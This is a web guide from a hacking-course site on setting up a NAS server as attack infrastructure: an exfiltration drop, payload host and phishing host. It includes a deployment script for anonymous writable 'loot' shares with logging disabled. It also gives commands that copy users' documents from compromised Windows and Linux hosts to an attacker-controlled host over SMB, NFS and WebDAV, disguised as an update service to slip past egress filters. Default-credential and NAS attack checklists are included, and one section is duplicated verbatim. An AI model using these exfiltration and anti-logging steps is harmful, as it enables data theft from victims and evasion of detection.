top of page

How To Set Up A NAS Server For Hacking (Guide)

How To Set Up A NAS Server For Pentesting (Guide) | Black Hat HQ

Setting Up A NAS Servers For Pentesting


Here's how to set up a NAS server, framed for pentest operations — whether it's for exfiltration staging, payload hosting, or as a target for security assessment. This is a guide on how to set up a NAS server for hacking.


Pentest Use Cases for a Self-Hosted NAS


Before building, clarify what the NAS is for:


Purpose

What You Need

Key Consideration

Exfiltration drop server

Quick SMB/NFS/WebDAV share

Must be externally reachable, minimal logging

Payload/tool hosting

HTTP/S + SMB for internal tool distribution

Accessible from all engagement hosts

Phishing landing page host

Web server on 80/443

Needs TLS, domain, clean IP reputation

Loot storage (encrypted)

Encrypted ZFS volume, isolated

Air-gapped or internal-only, strong encryption

Target for NAS pentest

Full TrueNAS/OMV/QNAP deployment

Realistic configuration, multiple services

C2 file staging

Lightweight HTTP/HTTPS

Redirector-friendly, disposable


Option 1: Lightweight NAS for Pentest Ops (Samba + WebDAV on Ubuntu)


Fastest to deploy, minimal attack surface. Run it on a VPS, old laptop, or dedicated server.


bash

#!/bin/bash
# pentest-nas.sh — Quick NAS deployment for pentest operations
# Deploys Samba + WebDAV + HTTPS file server on Ubuntu/Debian

set -e

# ===== Update and Install =====
apt update
apt install -y samba apache2 apache2-utils openssl

# ===== Create Directory Structure =====
mkdir -p /srv/nas/{payloads,loot,logs,tools,phishing}
chmod -R 755 /srv/nas
chown -R nobody:nogroup /srv/nas/loot   # Loot dir writeable by all

# ===== Samba Configuration (Internal Network) =====
cat > /etc/samba/smb.conf << 'SMBEOF'
[global]
   workgroup = WORKGROUP
   server string = Pentest NAS
   log file = /var/log/samba/log.%m
   max log size = 1000
   logging = file
   map to guest = Bad User
   # Minimal logging for ops
   log level = 0

[payloads]
   comment = Payloads and Tools
   path = /srv/nas/payloads
   browseable = yes
   read only = no
   guest ok = yes
   create mask = 0644

[loot]
   comment = Exfiltration Drop
   path = /srv/nas/loot
   browseable = no           # Hidden from casual browsing
   read only = no
   guest ok = yes
   create mask = 0666
   directory mask = 0777

[tools]
   comment = Pentest Tools
   path = /srv/nas/tools
   browseable = yes
   read only = yes
   guest ok = yes
SMBEOF

systemctl restart smbd
systemctl enable smbd

# Optional: NFS for Linux targets
apt install -y nfs-kernel-server
echo "/srv/nas/loot *(rw,sync,no_subtree_check,no_root_squash)" >> /etc/exports
echo "/srv/nas/tools *(ro,sync,no_subtree_check)" >> /etc/exports
systemctl restart nfs-kernel-server

echo "[+] Samba shares:"
echo "    \\\\$(hostname -I | awk '{print $1}')\\payloads"
echo "    \\\\$(hostname -I | awk '{print $1}')\\loot"
echo "    \\\\$(hostname -I | awk '{print $1}')\\tools"

How attackers use Samba in engagements:


bash

# Exfiltrate data from compromised Windows host to your NAS
# From target (CMD):
net use Z: \\YOUR_NAS_IP\loot
copy /Y C:\sensitive\*.* Z:\
net use Z: /delete

# From target (PowerShell):
New-PSDrive -Name "Z" -PSProvider FileSystem -Root "\\YOUR_NAS_IP\loot"
Copy-Item -Path "C:\Users\*\Documents\*" -Destination "Z:\" -Recurse

# From Linux target:
mount -t nfs YOUR_NAS_IP:/srv/nas/loot /mnt/drop
cp -r /home/*/ /mnt/drop/
umount /mnt/drop

WebDAV Over HTTPS (Exfiltrate Through Firewalls)


WebDAV over HTTPS looks like normal web traffic and bypasses egress filters that block SMB:


bash

# Enable WebDAV on Apache
a2enmod dav dav_fs dav_lock ssl rewrite
a2ensite default-ssl

cat > /etc/apache2/sites-available/webdav.conf << 'EOF'
<VirtualHost *:443>
    ServerName update-server.local
    DocumentRoot /srv/nas
    
    # Self-signed cert (replace with Let's Encrypt for production)
    SSLEngine on
    SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem
    SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
    
    # WebDAV for loot directory
    Alias /drop /srv/nas/loot
    <Directory /srv/nas/loot>
        DAV On
        Options Indexes
        AuthType Basic
        AuthName "Update Service"
        AuthUserFile /etc/apache2/.htpasswd
        Require valid-user
    </Directory>
    
    # Static file hosting for payloads
    Alias /payloads /srv/nas/payloads
    <Directory /srv/nas/payloads>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
    
    # Redirect logs to /dev/null for OPSEC
    ErrorLog /dev/null
    CustomLog /dev/null combined
</VirtualHost>
EOF

# Create WebDAV user
htpasswd -c /etc/apache2/.htpasswd pentest_user
a2ensite webdav
systemctl restart apache2

Exfiltration via WebDAV:


bash

# From compromised Windows host:
# Map WebDAV as a drive
net use X: https://YOUR_NAS_IP/drop /user:pentest_user password
copy secret_data.zip X:\

# Or via curl from Linux:
curl -T stolen_data.tar.gz https://YOUR_NAS_IP/drop/ \
     -u pentest_user:password --insecure

# PowerShell HTTP upload (no drive mapping needed):
Invoke-WebRequest -Uri "https://YOUR_NAS_IP/drop/loot.zip" \
    -Method Put -InFile "C:\temp\loot.zip" \
    -Credential (Get-Credential)

WebDAV Over HTTPS (Exfiltrate Through Firewalls)


WebDAV over HTTPS looks like normal web traffic and bypasses egress filters that block SMB:


bash

# Enable WebDAV on Apache
a2enmod dav dav_fs dav_lock ssl rewrite
a2ensite default-ssl

cat > /etc/apache2/sites-available/webdav.conf << 'EOF'
<VirtualHost *:443>
    ServerName update-server.local
    DocumentRoot /srv/nas
    
    # Self-signed cert (replace with Let's Encrypt for production)
    SSLEngine on
    SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem
    SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
    
    # WebDAV for loot directory
    Alias /drop /srv/nas/loot
    <Directory /srv/nas/loot>
        DAV On
        Options Indexes
        AuthType Basic
        AuthName "Update Service"
        AuthUserFile /etc/apache2/.htpasswd
        Require valid-user
    </Directory>
    
    # Static file hosting for payloads
    Alias /payloads /srv/nas/payloads
    <Directory /srv/nas/payloads>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
    
    # Redirect logs to /dev/null for OPSEC
    ErrorLog /dev/null
    CustomLog /dev/null combined
</VirtualHost>
EOF

# Create WebDAV user
htpasswd -c /etc/apache2/.htpasswd pentest_user
a2ensite webdav
systemctl restart apache2

Exfiltration via WebDAV:


bash

# From compromised Windows host:
# Map WebDAV as a drive
net use X: https://YOUR_NAS_IP/drop /user:pentest_user password
copy secret_data.zip X:\

# Or via curl from Linux:
curl -T stolen_data.tar.gz https://YOUR_NAS_IP/drop/ \
     -u pentest_user:password --insecure

# PowerShell HTTP upload (no drive mapping needed):
Invoke-WebRequest -Uri "https://YOUR_NAS_IP/drop/loot.zip" \
    -Method Put -InFile "C:\temp\loot.zip" \
    -Credential (Get-Credential)

Option 2: TrueNAS / FreeNAS - Full Enterprise NAS (Target or Infrastructure)


If you need a proper NAS with ZFS, snapshots, and enterprise features — either as pentest infrastructure for long engagements or as a realistic target to test against:


Hardware Requirements


  • 8GB RAM minimum (ZFS loves RAM — 16GB+ recommended)

  • 2+ identical drives for mirror/RAID

  • Any x86_64 system (old server, workstation, even a VM for testing)


Installation


bash

# 1. Download TrueNAS ISO from truenas.com
# 2. Flash to USB: dd if=TrueNAS.iso of=/dev/sdX bs=4M status=progress
# 3. Boot from USB, follow installer
# 4. After install, access web UI at http://IP_ADDRESS

# Initial CLI setup (option 1 from console menu):
# Configure network interface
# Set root password

Post-Install Configuration (Web UI)


Create Storage Pool:


Storage → Pools → Add
  Name: pentest_pool
  Select disks → Create
  Layout: Mirror (2 disks) or Stripe (single disk for VM testing)

Create Dataset for Pentest Operations:


Storage → Pools → pentest_pool → ⋮ → Add Dataset
  Name: loot
  Compression: lz4
  Encryption: YES (for sensitive pentest data)
    → Generate encryption key, download and store securely

Create SMB Share:


Sharing → SMB → Add
  Path: /mnt/pentest_pool/loot
  Name: Loot
  Purpose: No presets (custom)
  
Sharing → SMB → Edit ACL
  # For internal pentest use:
  User: nobody, Permission: FULL
  # Or restrict to specific users

Create NFS Share (for Linux targets):


Sharing → NFS → Add
  Path: /mnt/pentest_pool/loot
  Authorized Networks: 10.0.0.0/8 or specific IPs

TrueNAS as a Pentest Target - What To Test


If testing TrueNAS security specifically:


bash

# 1. Default credential check
#    TrueNAS default: root / (no password initially — it forces you to set one)
#    Try: admin / admin, root / password, root / truenas

# 2. Web UI vulnerabilities
#    TrueNAS runs on nginx + Django on ports 80/443
#    Check version: curl -s https://TARGET_IP | grep -i version
#    Search for CVEs against that version

# 3. API abuse testing
curl -sk https://TARGET_IP/api/v2.0/system/info
curl -sk -u root:password https://TARGET_IP/api/v2.0/user
#    TrueNAS API v2.0 is well-documented — test auth bypass, privilege escalation

# 4. SMB security
#    Null session enumeration:
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
#    Anonymous access to shares
smbclient //TARGET_IP/ShareName -N

# 5. NFS export security
showmount -e TARGET_IP
mount -t nfs TARGET_IP:/mnt/pentest_pool/loot /mnt/test
#    Check if no_root_squash is set (allows root access from client)

# 6. SSH access (TrueNAS runs SSH on port 22)
#    Check if root SSH is enabled
ssh root@TARGET_IP
#    Check for SSH keys in /root/.ssh/authorized_keys

Option 3: OpenMediaVault - Lighter Alternative


Better for low-resource hardware. Runs on Debian, has a web UI, good for quick deployments.


bash

# Install on Debian
apt install wget
wget -O - https://github.com/OpenMediaVault/openmediavault/raw/master/installScript | bash

# After reboot, access: http://IP_ADDRESS
# Default: admin / openmediavault

# Add SMB/CIFS shares through the web UI
# Plugins available: SMB, NFS, FTP, Rsync, WebDAV, Docker

# For pentest: enable SSH and use it as a Linux drop server
# with SMB for Windows targets and NFS for Linux targets

Option 4: QNAP / Synology Simulation (For Testing)


If the real pentest target is a QNAP or Synology NAS:


bash

# QNAP simulation for testing
# QNAP runs a modified Linux with BusyBox
# Common services: SMB, AFP, NFS, FTP, WebDAV, iSCSI, SSH, Telnet

# Key testing points for QNAP:
# 1. Default admin credentials: admin / admin (or MAC address as password)
# 2. QNAP firmware CVEs — they're frequent and severe
# 3. QTS web shell: /cgi-bin/ — test for command injection
# 4. Photo Station, Music Station, Video Station — frequent RCE targets
# 5. myQNAPcloud — cloud relay that bypasses firewall, test for exposure

# Synology DSM testing:
# 1. Default: admin / (blank)
# 2. DSM web UI exploits — check version-specific CVEs
# 3. SMB vulnerabilities with guest access
# 4. Synology Photos, Drive, Moments — web app vulnerabilities

Encrypted Loot Storage Setup


For sensitive exfiltration data that must stay encrypted at rest:


bash

# Create encrypted container on your NAS
# Using LUKS on Linux:

# Create encrypted file container (10GB)
dd if=/dev/urandom of=/srv/nas/encrypted_loot.img bs=1M count=10240
cryptsetup luksFormat /srv/nas/encrypted_loot.img

# Mount when needed
cryptsetup luksOpen /srv/nas/encrypted_loot.img loot_crypt
mkfs.ext4 /dev/mapper/loot_crypt
mount /dev/mapper/loot_crypt /mnt/secure_loot

# Exfiltrate to encrypted mount point
# When done:
umount /mnt/secure_loot
cryptsetup luksClose loot_crypt

# Now even if NAS is compromised, loot data is encrypted
# The container file is just random bytes without the passphrase

On TrueNAS, use native ZFS encryption:


Storage → Pools → Dataset → Edit → Encryption: ON
  Key format: Passphrase
  Enter passphrase → Save
  Download key backup → Store securely (offline, separate from NAS)

Operational Security for Pentest NAS


bash

# 1. Logging: Disable or minimize
#    - Samba: log level = 0 (errors only) in smb.conf
#    - Apache: ErrorLog /dev/null, CustomLog /dev/null
#    - Systemd journal: journalctl --vacuum-time=1d

# 2. Network isolation
#    - Bind services to WireGuard/VPN interface only
#    - Or restrict by source IP in iptables:
iptables -A INPUT -p tcp --dport 445 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 445 -j DROP

# 3. Separate NAS from C2 infrastructure
#    Don't run C2 and exfil server on same host

# 4. Encrypt all loot at rest (LUKS, ZFS encryption)

# 5. Burn after engagement
#    After pentest: securely wipe NAS storage
#    shred -n 3 -z /dev/sdX
#    Or for ZFS: zpool destroy pentest_pool
#    Then shred the underlying disks

# 6. Use a dedicated VLAN or isolated network segment
#    The NAS should not be reachable from the general internet

Quick Checklist for Pentest NAS Deployment


[ ] Hardware selected (old server, VPS, VM, or dedicated box)
[ ] OS installed (Ubuntu Server minimal, TrueNAS, or OMV)
[ ] Storage pool created (ZFS mirror or single disk)
[ ] Encryption enabled for loot dataset
[ ] Samba share created (authenticated or anonymous as needed)
[ ] NFS export configured (restricted to engagement IPs)
[ ] WebDAV over HTTPS set up (for firewall-safe exfiltration)
[ ] Logging minimized
[ ] Network isolation confirmed (VPN-only or firewall-restricted)
[ ] Test exfiltration: can a compromised host push data to it?
[ ] Test retrieval: can you pull the data back off securely?
[ ] Cleanup plan ready (wipe procedure documented)

Enroll In Online Cybersecurity & Hacking Classes/Courses | Black Hat HQ

Comments

Couldn’t Load Comments
It looks like there was a technical problem. Try reconnecting or refreshing the page.
bottom of page